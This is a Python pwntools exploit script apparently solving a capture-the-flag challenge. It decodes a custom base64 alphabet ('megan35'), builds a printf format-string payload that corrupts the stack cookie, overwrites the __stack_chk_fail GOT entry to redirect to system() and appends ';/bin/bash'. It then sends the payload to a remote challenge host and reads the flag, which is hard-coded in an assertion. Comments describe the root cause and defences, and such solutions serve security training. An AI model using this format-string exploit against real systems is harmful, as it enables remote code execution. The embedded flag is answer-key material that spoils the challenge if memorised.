- #!/usr/bin/python
import base64
import binascii
import sys
from pwn import *
# MEGAN35 DECODER, GOTO LINE 44
# Alphabets for several base64 "variants": each is a 65-character string
# (64 symbols plus the pad character) that B64VariantEncoder maps
# position-by-position onto the standard alphabet in `base`. Only megan35
# is used by the script below; the others are kept for reference.
megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2"
hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5"
# Standard base64 alphabet. NOTE: B64VariantEncoder.__init__ re-declares the
# same string as a local, so this module-level copy is not read by the class.
base = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
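class B64VariantEncoder:
    """Base64 codec that swaps the standard alphabet for a custom one.

    *translation* is a 65-character string (64 symbols plus the pad) mapped
    position-by-position onto the standard alphabet. ``lookup`` maps
    standard -> variant and ``revlookup`` maps variant -> standard.

    Raises:
        ValueError: if *translation* does not have exactly 65 characters
            (the previous implementation silently truncated the mapping
            through ``zip``, producing KeyErrors later on).
    """

    _BASE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

    def __init__(self, translation):
        if len(translation) != len(self._BASE):
            raise ValueError(
                "translation alphabet must have %d characters, got %d"
                % (len(self._BASE), len(translation))
            )
        self.lookup = dict(zip(self._BASE, translation))
        self.revlookup = dict(zip(translation, self._BASE))

    def encode(self, text):
        """Return *text* base64-encoded in the variant alphabet, as str.

        *text* may be bytes or str; a str (Python 3) / unicode (Python 2)
        value is UTF-8 encoded first. Byte strings are encoded as-is.
        """
        if not isinstance(text, bytes):
            text = text.encode("utf-8")
        # b64encode returns bytes on Python 3; iterating bytes yields ints,
        # so decode to str first so each element is a usable lookup key.
        standard = base64.b64encode(text).decode("ascii")
        return "".join(self.lookup[ch] for ch in standard)

    def decode(self, code):
        """Return the bytes that *code* (str or bytes, variant alphabet) encodes.

        Raises:
            KeyError: a character of *code* is outside the variant alphabet.
            binascii.Error: the translated base64 has incorrect padding
                (Python 3; Python 2 raised TypeError here).
        """
        if isinstance(code, bytes):
            code = code.decode("ascii")
        standard = "".join(self.revlookup[ch] for ch in code)
        return base64.b64decode(standard)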
def encode(variant, text):
    """Encode *text* with the base64 *variant* alphabet (see B64VariantEncoder)."""
    return B64VariantEncoder(variant).encode(text)
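def decode(variant, code):
    """Decode *code* written in the base64 *variant* alphabet.

    Returns the decoded bytes, or one of two sentinel strings on failure:
    ``"no valid encoding"`` when *code* contains a character outside the
    variant alphabet, ``"no correct padding"`` when the translated base64
    cannot be decoded. A malformed *variant* (wrong length) is not a decode
    failure and propagates as ValueError from the constructor.
    """
    encoder = B64VariantEncoder(variant)
    try:
        return encoder.decode(code)
    except KeyError:
        return "no valid encoding"
    except (TypeError, binascii.Error):
        # Python 2's b64decode raised TypeError on bad padding; Python 3
        # raises binascii.Error instead, which the original never caught.
        return "no correct padding"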
# Basic idea of attack, corrupt stack cookie, overwrite __stack_check_fail in GOT
#
# Vulnerability class: the remote service hands attacker-controlled text to
# printf as the *format string*, so the %n family of conversions turns into
# an arbitrary-write primitive. Corrupting the cookie is deliberate: it forces
# the __stack_chk_fail call whose GOT slot has just been redirected.
# Defensive notes: passing untrusted data as a format argument is the root
# cause (-Wformat -Wformat-security flags it at build time); full RELRO
# (-Wl,-z,relro,-z,now) makes the GOT read-only and closes the redirection;
# the stack-address leak that made STACK_COOKIE computable is a separate
# information-disclosure bug worth fixing on its own.
STACK_COOKIE = 0xffffddd0-52 # leaked stack address, found offset to cookie
FAIL_GOT=0x804A018
# NOTE(review): TARGET is defined but never referenced below; the values
# actually written come from the %Nx field widths in the payload.
TARGET=0xf7e38940 # target address of system in libc, accounted for 0x1b000 page offset
# overwrite both GOT address and stack cookie using %(h){1-2}n printf
# The positional indices 71-75 refer to the five p32 values pushed at the
# front of the payload; they are specific to this binary's stack layout.
# NOTE(review): str literals are concatenated onto p32() output here, which
# only works on Python 2 (shebang /usr/bin/python); on Python 3 p32 returns
# bytes and the "+=" lines would raise TypeError.
payload=p32(STACK_COOKIE) # 71
payload+=p32(FAIL_GOT) # 72
payload+=p32(FAIL_GOT+1) # 73
payload+=p32(FAIL_GOT+2) # 74
payload+=p32(FAIL_GOT+3) # 75
payload+="%71$n" # corrupt cookie
payload+="%37x"
payload+="%73$hhn"
payload+=" "
payload+="%72$hhn"
payload+="%165x"
payload+="%74$hhn"
payload+="%18x" # overwrite got address
payload+="%75$hhn;/bin/bash" # run /bin/bash
# some debug output
log.warn("Stack cookie at {0}".format(hex(STACK_COOKIE)))
# megan35 encode the payload
# The service evidently decodes its input with the megan35 alphabet before
# use; the custom alphabet is an encoding, not a protection, and adds nothing
# against this attack.
sendit = encode(megan35, payload)
#send ittttttttttttt
p = remote("megan35.stillhackinganyway.nl", 3535)
p.sendline(sendit)
p.recv(1024) # payload output
p.recv(1024) # shell error
p.sendline("\n\ncat flag")
flag = p.recv(1024)
# NOTE(review): `assert` is stripped under `python -O`, and a 1024-byte recv
# may return less than the whole response; a failed exploit surfaces as a
# bare AssertionError rather than a message.
assert ("flag{43eb404b714b8d22e1168775eba1669c}" in flag)
log.info("{0}".format(flag))
p.close()